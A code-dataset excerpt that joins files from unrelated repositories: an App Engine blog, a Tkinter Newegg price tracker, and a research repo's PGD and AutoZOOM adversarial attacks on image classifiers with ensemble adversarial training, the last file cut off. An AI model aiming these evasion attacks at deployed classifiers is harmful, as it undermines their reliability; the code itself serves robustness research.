query.order('-pub_date')
template_values = {'page_title': 'Yearly Post Archive: %d' % (year),
'page_description': 'Yearly Post Archive: %d' % (year),
}
page = view.Page()
page.render_paginated_query(self, query, 'posts', 'templates/blog/index.html', template_values)
class MonthHandler(webapp.RequestHandler):
def get(self, year, month):
year = int(year)
month = int(month)
# Build the time span to check for posts
start_date = datetime.datetime(year, month, 1)
end_year = year if month < 12 else year + 1
end_month = month + 1 if month < 12 else 1
end_date = datetime.datetime(end_year, end_month, 1)
# Create a query to find posts in the given time span
query = blog.Post.all()
query.filter('pub_date >= ', start_date)
query.filter('pub_date < ', end_date)
query.order('-pub_date')
month_text = start_date.strftime('%B %Y')
template_values = {'page_title': 'Monthly Post Archive: %s' % (month_text),
'page_description': 'Monthly Post Archive: %s' % (month_text),
}
page = view.Page()
page.render_paginated_query(self, query, 'posts', 'templates/blog/index.html', template_values)
class DayHandler(webapp.RequestHandler):
def get(self, year, month, day):
year = int(year)
month = int(month)
day = int(day)
# Build the time span to check for posts
start_date = datetime.datetime(year, month, day)
time_delta = datetime.timedelta(days=1)
end_date = start_date + time_delta
# Create a query to find posts in the given time span
query = blog.Post.all()
query.filter('pub_date >= ', start_date)
query.filter('pub_date < ', end_date)
query.order('-pub_date')
day_text = start_date.strftime('%x')
template_values = {'page_title': 'Daily Post Archive: %s' % (day_text),
'page_description': 'Daily Post Archive: %s' % (day_text),
}
page = view.Page()
page.render_paginated_query(self, query, 'posts', 'templates/blog/index.html', template_values)
class RSS2Handler(webapp.RequestHandler):
def get(self):
query = blog.Post.all()
query.order('-pub_date')
posts = query.fetch(10)
rss_items = []
for post in posts:
item = PyRSS2Gen.RSSItem(title=post.title,
link="%s%s" % (config.SETTINGS['url'], post.get_absolute_url()),
description=post.excerpt_html or post.body_html,
guid=PyRSS2Gen.Guid("%s%s" % (config.SETTINGS['url'], post.get_absolute_url())),
pubDate=post.pub_date
)
rss_items.append(item)
rss = PyRSS2Gen.RSS2(title=config.SETTINGS['title'],
link=config.SETTINGS['url'],
description=config.SETTINGS['description'],
lastBuildDate=datetime.datetime.now(),
items=rss_items
)
rss_xml = rss.to_xml()
self.response.headers['Content-Type'] = 'application/rss+xml'
self.response.out.write(rss_xml)
```
#### File: joeyb/joeyb-blog/main.py
```python
import config
import os
import sys
# Force sys.path to have our own directory first, so we can import from it.
sys.path.insert(0, config.APP_ROOT_DIR)
sys.path.insert(1, os.path.join(config.APP_ROOT_DIR, 'externals'))
import wsgiref.handlers
from google.appengine.ext import webapp
from handlers import blog, admin, error
def main():
application = webapp.WSGIApplication([('/', blog.IndexHandler),
('/blog/rss2', blog.RSS2Handler),
('/blog/tag/([-\w]+)', blog.TagHandler),
('/blog/(\d{4})', blog.YearHandler),
('/blog/(\d{4})/(\d{2})', blog.MonthHandler),
('/blog/(\d{4})/(\d{2})/(\d{2})', blog.DayHandler),
('/blog/(\d{4})/(\d{2})/(\d{2})/([-\w]+)', blog.PostHandler),
('/admin/clear-cache', admin.ClearCacheHandler),
('/admin/post/create', admin.CreatePostHandler),
('/admin/post/edit/(\d{4})/(\d{2})/(\d{2})/([-\w]+)', admin.EditPostHandler),
# If we make it this far then the page we are looking
# for does not exist
('/.*', error.Error404Handler),
],
debug=True)
wsgiref.handlers.CGIHandler().run(application)
if __name__ == '__main__':
main()
```
#### File: joeyb-blog/models/blog.py
```python
import datetime
import re
import markdown
from google.appengine.ext import db
from google.appengine.api import memcache
def slugify(value):
"""
Adapted from Django's django.template.defaultfilters.slugify.
"""
import unicodedata
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')
value = unicode(re.sub('[^\w\s-]', '', value).strip().lower())
return re.sub('[-\s]+', '-', value)
class Post(db.Model):
title = db.StringProperty()
slug = db.StringProperty()
pub_date = db.DateTimeProperty(auto_now_add=True)
author = db.UserProperty(auto_current_user_add=True)
excerpt = db.TextProperty(default=None)
body = db.TextProperty()
excerpt_html = db.TextProperty(default=None)
body_html = db.TextProperty()
tags = db.StringListProperty()
def get_absolute_url(self):
return "/blog/%04d/%02d/%02d/%s" % (self.pub_date.year,
self.pub_date.month,
self.pub_date.day,
self.slug)
def get_edit_url(self):
return "/admin/post/edit/%04d/%02d/%02d/%s" % (self.pub_date.year,
self.pub_date.month,
self.pub_date.day,
self.slug)
def put(self):
"""
Make sure that the slug is unique for the given date before
the data is actually saved.
"""
# Delete the cached archive list if we are saving a new post
if not self.is_saved():
memcache.delete('archive_list')
# Delete the cached tag list whenever a post is created/updated
memcache.delete('tag_list')
self.test_for_slug_collision()
self.populate_html_fields()
key = super(Post, self).put()
return key
def test_for_slug_collision(self):
# Build the time span to check for slug uniqueness
start_date = datetime.datetime(self.pub_date.year,
self.pub_date.month,
self.pub_date.day)
time_delta = datetime.timedelta(days=1)
end_date = start_date + time_delta
# Create a query to check for slug uniqueness in the specified time span
query = Post.all(keys_only=True)
query.filter('pub_date >= ', start_date)
query.filter('pub_date < ', end_date)
query.filter('slug = ', self.slug)
# Get the Post Key that match the given query (if it exists)
post = query.get()
# If any slug matches were found then an exception should be raised
if post and (not self.is_saved() or self.key() != post):
raise SlugConstraintViolation(start_date, self.slug)
def populate_html_fields(self):
# Setup Markdown with the code highlighter
md = markdown.Markdown(extensions=['codehilite'])
# Convert the excerpt and body Markdown into html
if self.excerpt != None:
self.excerpt_html = md.convert(self.excerpt)
if self.body != None:
self.body_html = md.convert(self.body)
class SlugConstraintViolation(Exception):
def __init__(self, date, slug):
super(SlugConstraintViolation, self).__init__("Slug '%s' is not unique for date '%s'." % (slug, date.date()))
``` |
{
"source": "Joey-Boivin/newegg-tracker",
"score": 3
} |
#### File: App/Graphic/app.py
```python
from tkinter import *
from tkinter import ttk
import webbrowser
from PIL import ImageTk, Image #Tkinter's image management is outdated
root = Tk()
root.config(bg="#2D2D2D")
root.title("Newegg tracker by Joey-Boivin on GitHub")
root.geometry("1050x900")
main_frame = Frame(root)
main_frame.pack(fill=BOTH, expand=1)
my_canvas = Canvas(main_frame)
my_canvas.pack(side=LEFT, fill=BOTH, expand=1)
my_scrollbar = ttk.Scrollbar(main_frame, orient=VERTICAL, command=my_canvas.yview)
my_scrollbar.pack(side=RIGHT, fill=Y)
my_canvas.configure(bg='#2D2D2D', yscrollcommand=my_scrollbar.set)
my_canvas.bind('<Configure>', lambda e: my_canvas.configure(scrollregion=my_canvas.bbox('all')))
second_frame = Frame(my_canvas)
second_frame.config(bg='#2D2D2D')
my_canvas.create_window((0,0), window=second_frame, anchor='nw')
class Application:
"""
This is the class containing the graphical user interface.
"""
def __init__(self, data:dict):
self.data = data
icons, price_widgets, name_widgets, meta_widgets, button_widgets = self.create_widgets()
self.show_widgets(icons, price_widgets, name_widgets, meta_widgets, button_widgets)
def create_widgets(self):
"""
Creates all the widgets for the gui, including icons, name labels,
metadata about the items, and a "show on Newegg" button.
"""
icons = []
price_widgets = []
name_widgets = []
meta_widgets = []
newegg_button_widgets = []
for tag, _data in self.data['items'].items():
path = f'./Graphic/Images/{_data["img-token"]}.png'
img = ImageTk.PhotoImage(Image.open(path).resize((100,100)))
icons.append(img)
price = list(_data['history'].values())[-1] #last value
price_widget = Label(second_frame, text=price, bg='#2D2D2D', fg='white')
price_widgets.append(price_widget)
metadata = _data['metadata']
display = ""
if metadata:
for key, value in metadata.items():
display += str(key) + ': ' + str(value)
if len(metadata.items()) > 1:
display += '\n'
display = Label(second_frame, text=display, bg='#2D2D2D', fg='white')
meta_widgets.append(display)
name = _data['product-name']
name_widget = Label(second_frame, text=name, bg='#2D2D2D', fg='white')
name_widgets.append(name_widget)
newegg_button = Button(second_frame, text='See on Newegg.ca', bg='Black', fg='white', command=lambda tag=tag: self.show_on_newegg(tag))
newegg_button_widgets.append(newegg_button)
return icons, price_widgets, name_widgets, meta_widgets, newegg_button_widgets
def show_widgets(
self, icons:list, price_widgets:list,
name_widgets:list, meta_widgets:list, button_widgets:list
):
"""
Shows the widgets for the gui
"""
for i in range(int(self.data['number-of-items'])):
panel = Label(second_frame, image=icons[i])
panel.grid(row=i, column=0, padx = '50', pady='10')
name_widgets[i].grid(row=i, column=1, padx = '50', pady='10')
price_widgets[i].grid(row=i,column=2, padx = '50', pady='10')
meta_widgets[i].grid(row=i,column=3, padx = '50', pady='10')
button_widgets[i].grid(row=i, column=4, padx = '40', pady='10')
root.mainloop()
@staticmethod
def show_on_newegg(tag:str):
"""
Opens a new tab on Newegg.ca the tracked item.
"""
webbrowser.open_new(f'www.newegg.ca/{tag}')
``` |
{
"source": "joeybose/Adversarial-Example-Games",
"score": 2
} |
#### File: Adversarial-Example-Games/attacks/pgd.py
```python
from __future__ import print_function
import os
import argparse
import ipdb
import sys
sys.path.append("..") # Adds higher directory to python modules path.
from utils.utils import load_mnist
from cnn_models import LeNet as Net
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from advertorch.context import ctx_noparamgrad_and_eval
from advertorch.test_utils import LeNet5
from advertorch_examples.utils import get_mnist_train_loader
from advertorch_examples.utils import get_mnist_test_loader
from advertorch.attacks import Attack
from advertorch.attacks import LinfPGDAttack, L2PGDAttack
class PGDAttack(Attack):
def __init__(self, args, model, nb_iter,
loss_fn=nn.CrossEntropyLoss(reduction="sum")):
super(PGDAttack, self).__init__(args, model, nb_iter, loss_fn)
self.args = args
self.model = model
if args.attack_ball == 'Linf':
self.adversary = LinfPGDAttack(self.model, loss_fn=loss_fn,
eps=args.epsilon, nb_iter=nb_iter,
eps_iter=0.01, rand_init=True,
clip_min=args.clip_min,clip_max=args.clip_max,
targeted=False)
elif args.attack_ball == 'L2':
self.adversary = L2PGDAttack(self.model, loss_fn=loss_fn,
eps=args.epsilon, nb_iter=nb_iter,
eps_iter=0.01, rand_init=True,
clip_min=args.clip_min,clip_max=args.clip_max,
targeted=False)
else:
raise NotImplementedError
def train(self, train_loader, test_loader, l_test_classifiers, l_train_classif=None):
pass
def perturb(self, x, target):
advcorrect, clncorrect, test_clnloss, test_advloss = 0, 0, 0, 0
x = x.to(self.args.dev)
target = target.to(self.args.dev)
with torch.no_grad():
output = self.model(x)
test_clnloss += F.cross_entropy(
output, target, reduction='sum').item()
pred = output.max(1, keepdim=True)[1]
clncorrect += pred.eq(target.view_as(pred)).sum().item()
advdata = self.adversary.perturb(x, target)
with torch.no_grad():
output = self.model(advdata)
test_advloss += F.cross_entropy(
output, target, reduction='sum').item()
pred = output.max(1, keepdim=True)[1]
advcorrect += pred.eq(target.view_as(pred)).sum().item()
print('Clean loss: {:.4f},'
'Adv acc: {}/{} ({:.2f}%)\n'.format(test_clnloss, clncorrect,
len(x), 100. * clncorrect /
len(x)))
print('Adv loss: {:.4f},'
'Adv acc: {}/{} ({:.2f}%)\n'.format( test_advloss, advcorrect,
len(x), 100. * advcorrect /
len(x)))
```
#### File: Adversarial-Example-Games/attacks/run_autozoom.py
```python
import argparse
import glob
import json
import os
import os.path as osp
import random
import glog as log
import numpy as np
import torch
from torch.nn import functional as F
import torch.nn as nn
import torch.autograd as autograd
from autozoom_attack import ZOO, ZOO_AE, AutoZOOM_BiLIN, AutoZOOM_AE
from nattack import weights_init
from codec import Codec
# from autozoom_dataset.dataset_loader_maker import DataLoaderMaker
import sys
sys.path.append("..") # Adds higher directory to python modules path.
from utils.utils import *
from cnn_models.vgg_robustnet import VGG_noisy
from cnn_models import LeNet as Net
from cnn_models import VGG
from classifiers import load_all_classifiers, load_list_classifiers, load_dict_classifiers
from eval import baseline_transfer, baseline_eval_classifier
import ipdb
PY_ROOT = "./"
IMAGE_SIZE = {"cifar":(32,32), "CIFAR-100":(32,32), "ImageNet":(224,224),
"mnist":(28, 28), "FashionMNIST":(28,28), "SVHN":(32,32),
"TinyImageNet": (64,64)}
IN_CHANNELS = {"mnist":1, "FashionMNIST":1, "cifar":3, "ImageNet":3, "CIFAR-100":3, "SVHN":3, "TinyImageNet":3}
CLASS_NUM = {"mnist":10,"FashionMNIST":10, "cifar":10, "CIFAR-100":100, "ImageNet":1000, "SVHN":10, "TinyImageNet":200}
class AutoZoomAttackFramework(object):
def __init__(self, args, dataset_loader):
self.dataset_loader = dataset_loader
self.total_images = len(self.dataset_loader.dataset)
self.query_all = torch.zeros(self.total_images)
self.correct_all = torch.zeros_like(self.query_all) # number of images
self.not_done_all = torch.zeros_like(self.query_all) # always set to 0 if the original image is misclassified
self.success_all = torch.zeros_like(self.query_all)
self.success_query_all = torch.zeros_like(self.query_all)
self.not_done_loss_all = torch.zeros_like(self.query_all)
self.not_done_prob_all = torch.zeros_like(self.query_all)
def cw_loss(self, logit, label, target=None):
if target is not None:
# targeted cw loss: logit_t - max_{i\neq t}logit_i
_, argsort = logit.sort(dim=1, descending=True)
target_is_max = argsort[:, 0].eq(target).long()
second_max_index = target_is_max.long() * argsort[:, 1] + (1 - target_is_max).long() * argsort[:, 0]
target_logit = logit[torch.arange(logit.shape[0]), target]
second_max_logit = logit[torch.arange(logit.shape[0]), second_max_index]
return target_logit - second_max_logit
else:
# untargeted cw loss: max_{i\neq y}logit_i - logit_y
_, argsort = logit.sort(dim=1, descending=True)
gt_is_max = argsort[:, 0].eq(label).long()
second_max_index = gt_is_max.long() * argsort[:, 1] + (1 - gt_is_max).long() * argsort[:, 0]
gt_logit = logit[torch.arange(logit.shape[0]), label]
second_max_logit = logit[torch.arange(logit.shape[0]), second_max_index]
return second_max_logit - gt_logit
def make_adversarial_examples(self, batch_index, images, true_labels, args, attacker, target_model, codec):
if args.attack_method == "zoo_ae" or args.attack_method == "autozoom_ae":
# log ae info
decode_img = codec(images)
diff_img = (decode_img - images)
diff_mse = torch.mean(diff_img.view(-1).pow(2)).item()
print("[AE] MSE:{:.4f}".format(diff_mse))
batch_size = 1
selected = torch.arange(batch_index * batch_size,
(batch_index + 1) * batch_size) # 选择这个batch的所有图片的index
if args.attack_type == "targeted":
if args.target_type == "random":
with torch.no_grad():
logit = target_model(images)
target_labels = torch.randint(low=0, high=CLASS_NUM[args.dataset], size=true_labels.size()).long().cuda()
invalid_target_index = target_labels.eq(true_labels)
while invalid_target_index.sum().item() > 0:
target_labels[invalid_target_index] = torch.randint(low=0, high=logit.shape[1],
size=target_labels[
invalid_target_index].shape).long().cuda()
invalid_target_index = target_labels.eq(true_labels)
elif args.target_type == 'least_likely':
with torch.no_grad():
logit = target_model(images)
target_labels = logit.argmin(dim=1)
else:
target_labels = torch.fmod(true_labels + 1, CLASS_NUM[args.dataset])
else:
target_labels = None
print("Begin attack batch {}!".format(batch_index))
with torch.no_grad():
adv_images, stats_info = attacker.attack(images, true_labels, target_labels)
query = stats_info["query"]
correct = stats_info["correct"]
not_done = stats_info["not_done"]
success = stats_info["success"]
success_query = stats_info["success_query"]
not_done_prob = stats_info["not_done_prob"]
adv_logit = stats_info["adv_logit"]
adv_loss = self.cw_loss(adv_logit, true_labels, target_labels)
not_done_loss = adv_loss * not_done
return success, query, adv_images
def attack_dataset_images(self, args, attacker, arch_name, target_model,
codec, l_test_classif_paths, adv_models, result_dump_path='.'):
success_list, query_list, adv_img_list = [], [], []
for batch_idx, data_tuple in enumerate(self.dataset_loader):
print(batch_idx)
if batch_idx > args.num_attack:
break
if args.dataset == "ImageNet":
if args.input_size >= 299:
images, true_labels = data_tuple[1], data_tuple[2]
else:
images, true_labels = data_tuple[0], data_tuple[2]
else:
images, true_labels = data_tuple[0], data_tuple[1]
if images.size(-1) != args.input_size:
images = F.interpolate(images, size=target_model.module.input_size[-1], mode='bilinear',align_corners=True)
success, query, adv_images = self.make_adversarial_examples(batch_idx, images.cuda(), true_labels.cuda(),
args, attacker, target_model, codec)
success_list.append(success)
adv_img_list.append([adv_images, true_labels])
avg_correct = sum(success_list) / float(len(success_list))
print('{} is attacked finished ({} images)'.format(arch_name, self.total_images))
print(' avg correct: {:.4f}'.format(avg_correct.item()))
# print(' avg correct: {:.4f}'.format(self.correct_all.mean().item()))
print(' avg not_done: {:.4f}'.format(self.not_done_all.mean().item())) # 有多少图没做完
if self.success_all.sum().item() > 0:
print(
' avg mean_query: {:.4f}'.format(self.success_query_all[self.success_all.byte()].mean().item()))
print(
' avg median_query: {:.4f}'.format(self.success_query_all[self.success_all.byte()].median().item()))
print(' max query: {}'.format(self.success_query_all[self.success_all.byte()].max().item()))
if self.not_done_all.sum().item() > 0:
print(
' avg not_done_loss: {:.4f}'.format(self.not_done_loss_all[self.not_done_all.byte()].mean().item()))
print(
' avg not_done_prob: {:.4f}'.format(self.not_done_prob_all[self.not_done_all.byte()].mean().item()))
print('Saving results to {}'.format(result_dump_path))
# meta_info_dict = {"avg_correct": self.correct_all.mean().item(),
# "avg_not_done": self.not_done_all.mean().item(),
# "mean_query": self.success_query_all[self.success_all.byte()].mean().item(),
# "median_query": self.success_query_all[self.success_all.byte()].median().item(),
# "max_query": self.success_query_all[self.success_all.byte()].max().item(),
# "not_done_loss": self.not_done_loss_all[self.not_done_all.byte()].mean().item(),
# "not_done_prob": self.not_done_prob_all[self.not_done_all.byte()].mean().item()}
# meta_info_dict['args'] = vars(args)
# with open(result_dump_path, "w") as result_file_obj:
# json.dump(meta_info_dict, result_file_obj, indent=4, sort_keys=True)
print("done, write stats info to {}".format(result_dump_path))
if args.transfer:
baseline_transfer(args, attacker, args.attack_method, arch_name,
adv_img_list, l_test_classif_paths, adv_models)
def main(args, arch):
adv_models = None
train_loader, test_loader = create_loaders(args, root='../data')
if args.dataset == 'cifar':
args.nc, args.h, args.w = 3, 32, 32
args.input_size = 32
model, l_test_classif_paths = load_all_classifiers(args, load_archs=[args.source_arch])
model_type = args.source_arch
if args.target_arch is not None:
model_target, l_test_classif_paths = load_all_classifiers(args, load_archs=[args.target_arch])
model_type = args.target_arch
del model_target
torch.cuda.empty_cache()
elif args.dataset == 'mnist':
args.input_size = 28
if args.source_arch == 'natural':
model, l_test_classif_paths = load_all_classifiers(args, load_archs=["natural"])
model_type = 'natural'
elif args.source_arch == 'ens_adv':
adv_model_names = args.adv_models
adv_models = [None] * len(adv_model_names)
for i in range(len(adv_model_names)):
type = get_model_type(adv_model_names[i])
adv_models[i] = load_model(args, adv_model_names[i], type=type).to(args.dev)
path = os.path.join(args.dir_test_models, "pretrained_classifiers",
args.dataset, "ensemble_adv_trained", args.model)
model = load_model(args, args.model, type=args.type)
l_test_classif_paths = [path]
model_type = 'Ensemble Adversarial'
model.to(args.dev)
model.eval()
test_classifier(args, model, args.dev, test_loader, epoch=1)
print("Testing on %d Test Classifiers" %(len(l_test_classif_paths)))
# attack related settings
if args.attack_method == "zoo" or args.attack_method == "autozoom_bilin":
if args.img_resize is None:
args.img_resize = args.input_size
print("Argument img_resize is not set and not using autoencoder, set to image original size:{}".format(
args.img_resize))
codec = None
if args.attack_method == "zoo_ae" or args.attack_method == "autozoom_ae":
codec = Codec(args.input_size, IN_CHANNELS[args.dataset],
args.compress_mode, args.resize, use_tanh=args.use_tanh)
codec.load_codec(args,codec_path)
codec.cuda()
decoder = codec.decoder
args.img_resize = decoder.input_shape[1]
print("Loading autoencoder: {}, set the attack image size to:{}".format(args.codec_path, args.img_resize))
# setup attack
if args.attack_method == "zoo":
blackbox_attack = ZOO(model, args.dataset, args)
elif args.attack_method == "zoo_ae":
blackbox_attack = ZOO_AE(model, args.dataset, args, decoder)
elif args.attack_method == "autozoom_bilin":
blackbox_attack = AutoZOOM_BiLIN(model, args.dataset, args)
elif args.attack_method == "autozoom_ae":
blackbox_attack = AutoZOOM_AE(model, args["dataset"], args, decoder)
target_str = "untargeted" if args.attack_type!="targeted" else "targeted_{}".format(args.target_type)
attack_framework = AutoZoomAttackFramework(args, test_loader)
attack_framework.attack_dataset_images(args, blackbox_attack, arch, model,
codec, l_test_classif_paths=l_test_classif_paths,
adv_models=adv_models)
model.cpu()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-a", "--attack_method", type=str, required=True,
choices=["zoo", "zoo_ae", "autozoom_bilin", "autozoom_ae"], help="the attack method")
parser.add_argument("-b", "--batch_size", type=int, default=1, help="the batch size for zoo, zoo_ae attack")
parser.add_argument("-c", "--init_const", type=float, default=1, help="the initial setting of the constant lambda")
parser.add_argument("-d", "--dataset", type=str, required=True, choices=["cifar", "CIFAR-100", "ImageNet", "mnist", "FashionMNIST"])
parser.add_argument("-m", "--max_iterations", type=int, default=None, help="set 0 to use the default value")
parser.add_argument("-n", "--num_attack", type=int, default=100,
help="Number of images to attack")
parser.add_argument("-p", "--print_every", type=int, default=100,
help="print information every PRINT_EVERY iterations")
parser.add_argument("--attack_type", default="untargeted", choices=["targeted", "untargeted"],
help="the type of attack")
parser.add_argument('--transfer', action='store_true')
parser.add_argument("--early_stop_iters", type=int, default=100,
help="print objs every EARLY_STOP_ITER iterations, 0 is maxiter//10")
parser.add_argument("--confidence", default=0, type=float, help="the attack confidence")
parser.add_argument("--codec_path", default=None, type=str, help="the coedec path, load the default codec is not set")
parser.add_argument("--target_type", type=str, default="increment", choices=['random', 'least_likely',"increment"],
help="if set, choose random target, otherwise attack every possible target class, only works when ATTACK_TYPE=targeted")
parser.add_argument("--num_rand_vec", type=int, default=1,
help="the number of random vector for post success iteration")
parser.add_argument("--img_offset", type=int, default=0,
help="the offset of the image index when getting attack data")
parser.add_argument("--img_resize", default=None, type=int,
help="this option only works for ATTACK METHOD zoo and autozoom_bilin")
parser.add_argument("--epsilon", type=float, default=4.6, help="the maximum threshold of L2 constraint")
parser.add_argument("--resize", default=None,type=int, help="this option only works for the preprocess resize of images")
parser.add_argument("--switch_iterations", type=int, default=None,
help="the iteration number for dynamic switching")
parser.add_argument("--compress_mode", type=int, default=None,
help="specify the compress mode if autoencoder is used")
parser.add_argument('--test_archs', action="store_true")
parser.add_argument('--use_tanh', default=False, action="store_true")
parser.add_argument('--source_arch', default="res18",
help="The architecture we want to attack on CIFAR.")
parser.add_argument('--target_arch', default=None,
help="The architecture we want to blackbox transfer to on CIFAR.")
parser.add_argument('--noise', type=float, default=0.3)
parser.add_argument('--lr', type=float, default=0.01, metavar='LR',
help='learning rate for the generator (default: 0.01)')
parser.add_argument('--seed', default=0, type=int, help='random seed')
parser.add_argument('--robust_load_path', type=str, default='../../Nattack/all_models/robustnet/noise_0.3.pth')
parser.add_argument('--load_path', type=str,
default='../pretrained_classifiers/cifar/VGG16/model_1.pt')
parser.add_argument('--robust_model_path', type=str,
default="../madry_challenge_models/mnist/adv_trained/mnist_lenet5_advtrained.pt")
parser.add_argument('--dir_test_models', type=str,
default="../",
help="The path to the directory containing the classifier models for evaluation.")
parser.add_argument('--train_set', default='test',
choices=['train_and_test','test','train'],
help='add the test set in the training set')
parser.add_argument('--train_on_list', default=False, action='store_true',
help='train on a list of classifiers')
parser.add_argument('--test_batch_size', type=int, default=1, metavar='S')
parser.add_argument('--train_with_critic_path', type=str, default=None,
help='Train generator with saved critic model')
# args = vars(args)
args = parser.parse_args()
args.dev = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
args.max_test_model = 2
# args["codec_path"] = list(glob.glob(args["codec_path"].format(PY_ROOT)))[0]
if args.img_resize is not None:
if args.attack_method == "zoo_ae" or args.attack_method == "autozoom_ae":
print("Attack method {} cannot use option img_resize, arugment ignored".format(args["attack_method"]))
if args.attack_type == "targeted" and args.max_iterations < 20000:
args.max_iterations = 5 * args.max_iterations
print('Command line is: {}'.format(' '.join(sys.argv)))
print('Called with args:')
# setup random seed
random.seed(args.seed)
np.random.seed(args.seed)
torch.backends.cudnn.deterministic = True
torch.manual_seed(args.seed)
archs = [args.source_arch]
dataset = args.dataset
if args.test_archs:
archs.clear()
if dataset == "cifar" or dataset == "CIFAR-100":
for arch in MODELS_TEST_STANDARD[dataset]:
test_model_path = "{}/train_pytorch_model/real_image_model/{}-pretrained/{}/checkpoint.pth.tar".format(
PY_ROOT,
dataset, arch)
if os.path.exists(test_model_path):
archs.append(arch)
else:
print(test_model_path + " does not exists!")
else:
for arch in MODELS_TEST_STANDARD[dataset]:
test_model_list_path = "{}/train_pytorch_model/real_image_model/{}-pretrained/checkpoints/{}*.pth.tar".format(
PY_ROOT,
dataset, arch)
test_model_list_path = list(glob.glob(test_model_list_path))
if len(test_model_list_path) == 0: # this arch does not exists in args.dataset
continue
archs.append(arch)
args.arch = ",".join(archs)
for arch in archs:
main(args, arch)
```
#### File: Adversarial-Example-Games/defenses/ensemble_adver_train_mnist.py
```python
import torch
import torchvision
import torch.optim as optim
import torch.utils.data
from torchvision import datasets, transforms
import os
import argparse
import numpy as np
import ipdb
import json
import sys
sys.path.append("..") # Adds higher directory to python modules path.
from utils.utils import create_loaders, load_unk_model, test_classifier
from cnn_models import *
from cnn_models.mnist_ensemble_adv_train_models import *
from classifiers import load_one_classifier
# Code Taken from: https://github.com/cailk/ensemble-adv-training-pytorch
EVAL_FREQUENCY = 100
ARCHITECTURES = {
'VGG16': (VGG, 50),
'res18': (resnet.ResNet18, 500),
'res18_adv': (resnet.ResNet18, 500),
'res18_ens': (resnet.ResNet18, 500),
'dense121': (densenet.densenet_cifar, 500),
'dense121_adv': (densenet.densenet_cifar, 500),
'dense121_ens': (densenet.densenet_cifar, 500),
'googlenet': (googlenet.GoogLeNet, 500),
'googlenet_adv': (googlenet.GoogLeNet, 500),
'googlenet_ens': (googlenet.GoogLeNet, 500),
'lenet': (LeNet, 250),
'wide_resnet': (wide_resnet.Wide_ResNet, None),
'wide_resnet_adv': (wide_resnet.Wide_ResNet, None),
'wide_resnet_ens': (wide_resnet.Wide_ResNet, None)
}
def gen_adv_loss(logits, labels, loss='logloss', mean=False):
'''
Generate the loss function
'''
if loss == 'training':
# use the model's output instead of the true labels to avoid
# label leaking at training time
labels = logits.max(1)[1]
if mean:
out = F.cross_entropy(logits, labels, reduction='mean')
else:
out = F.cross_entropy(logits, labels, reduction='sum')
elif loss == 'logloss':
if mean:
out = F.cross_entropy(logits, labels, reduction='mean')
else:
out = F.cross_entropy(logits, labels, reduction='sum')
else:
raise ValueError('Unknown loss: {}'.format(loss))
return out
def gen_grad(x, model, y, loss='logloss'):
'''
Generate the gradient of the loss function.
'''
model.eval()
x.requires_grad = True
# Define gradient of loss wrt input
logits = model(x)
adv_loss = gen_adv_loss(logits, y, loss)
model.zero_grad()
adv_loss.backward()
grad = x.grad.data
return grad
def symbolic_fgs(data, grad, eps=0.3, clipping=True):
'''
FGSM attack.
'''
# signed gradien
normed_grad = grad.detach().sign()
# Multiply by constant epsilon
scaled_grad = eps * normed_grad
# Add perturbation to original example to obtain adversarial example
adv_x = data.detach() + scaled_grad
if clipping:
adv_x = torch.clamp(adv_x, 0, 1)
return adv_x
def iter_fgs(model, data, labels, steps, eps):
'''
I-FGSM attack.
'''
adv_x = data
# iteratively apply the FGSM with small step size
for i in range(steps):
grad = gen_grad(adv_x, model, labels)
adv_x = symbolic_fgs(adv_x, grad, eps)
return adv_x
def train_ens(epoch, batch_idx, model, data, labels, optimizer, x_advs=None,
opt_step=True):
model.train()
optimizer.zero_grad()
# Generate cross-entropy loss for training
logits = model(data)
preds = logits.max(1)[1]
loss1 = gen_adv_loss(logits, labels, mean=True)
# add adversarial training loss
if x_advs is not None:
# choose source of adversarial examples at random
# (for ensemble adversarial training)
idx = np.random.randint(len(x_advs))
logits_adv = model(x_advs[idx])
loss2 = gen_adv_loss(logits_adv, labels, mean=True)
loss = 0.5 * (loss1 + loss2)
else:
loss2 = torch.zeros(loss1.size())
loss = loss1
if opt_step:
loss.backward()
optimizer.step()
if batch_idx % EVAL_FREQUENCY == 0:
print('Step: {}(epoch: {})\tLoss: {:.6f}<=({:.6f}, {:.6f})\tError: {:.2f}%'.format(
batch_idx, epoch+1, loss.item(), loss1.item(), loss2.item(), error_rate(preds, labels)
))
return loss
def test(model, data, labels):
model.eval()
correct = 0
logits = model(data)
# Prediction for the test set
preds = logits.max(1)[1]
correct += preds.eq(labels).sum().item()
return correct
def error_rate(preds, labels):
'''
Run the error rate
'''
assert preds.size() == labels.size()
return 100.0 - (100.0 * preds.eq(labels).sum().item()) / preds.size(0)
def get_model_type(model_name):
model_type = {
'modelA': 0, 'modelA_adv': 0, 'modelA_ens': 0, 'modelA_ens1': 0,
'modelB': 1, 'modelB_adv': 1, 'modelB_ens': 1, 'modelB_ens1': 1,
'modelC': 2, 'modelC_adv': 2, 'modelC_ens': 2, 'modelC_ens1': 2,
'modelD': 3, 'modelD_adv': 3, 'modelD_ens': 3, 'modelD_ens1': 3,
'res18': 4, 'res18_adv': 4, 'res18_ens': 4,
'googlenet': 5, 'googlenet_adv': 5, 'googlenet_ens': 5,
'wide_resnet': 6, 'wide_resnet_adv': 6, 'wide_resnet_ens': 6,
'dense121': 7, 'dense121_adv': 7, 'dense121_ens': 7,
}
if model_name not in model_type.keys():
raise ValueError('Unknown model: {}'.format(model_name))
return model_type[model_name]
def main(args):
torch.manual_seed(args.seed)
device = torch.device('cuda' if args.cuda else 'cpu')
train_loader, test_loader = create_loaders(args, root='../data')
eps = args.epsilon
# if src_models is not None, we train on adversarial examples that come
# from multiple models
if args.train_adv:
adv_model_names = args.adv_models
adv_models = [None] * len(adv_model_names)
for i in range(len(adv_model_names)):
type = get_model_type(adv_model_names[i])
if args.dataset == 'cifar':
adv_models[i] = load_one_classifier(args,
load_archs=[adv_model_names[i]]).to(device)
acc = test_classifier(args, adv_models[i], args.dev, test_loader, epoch=0, logger=None)
print("Dataset: %s Model: %s Test set acc: %f" %(args.dataset,
adv_model_names[i], acc))
adv_models[i] = nn.DataParallel(adv_models[i])
else:
adv_models[i] = load_model(args, adv_model_names[i], type=type).to(device)
if args.dataset == 'cifar':
init_func, _ = ARCHITECTURES[args.model]
model = init_func().to(args.dev)
if "wide_resnet" in args.model:
model.apply(wide_resnet.conv_init)
model = nn.DataParallel(model)
else:
